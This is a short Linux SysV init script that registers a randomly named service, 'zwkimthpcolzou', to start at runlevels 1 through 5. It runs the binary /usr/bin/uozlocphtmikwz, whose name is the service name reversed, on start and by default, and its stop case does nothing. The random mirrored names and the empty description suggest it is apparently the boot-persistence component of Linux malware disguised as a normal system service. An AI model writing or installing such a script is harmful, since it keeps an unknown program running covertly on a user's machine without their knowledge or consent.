#!/bin/sh
# chkconfig: 12345 90 90
# description: zwkimthpcolzou
### BEGIN INIT INFO
# Provides: zwkimthpcolzou
# Required-Start:
# Required-Stop:
# Default-Start: 1 2 3 4 5
# Default-Stop:
# Short-Description: zwkimthpcolzou
### END INIT INFO
case $1 in
start)
	"/usr/bin/uozlocphtmikwz"
  break
	;;
stop)
  break
	;;
*)
	"/usr/bin/uozlocphtmikwz"
  break
	;;
esac
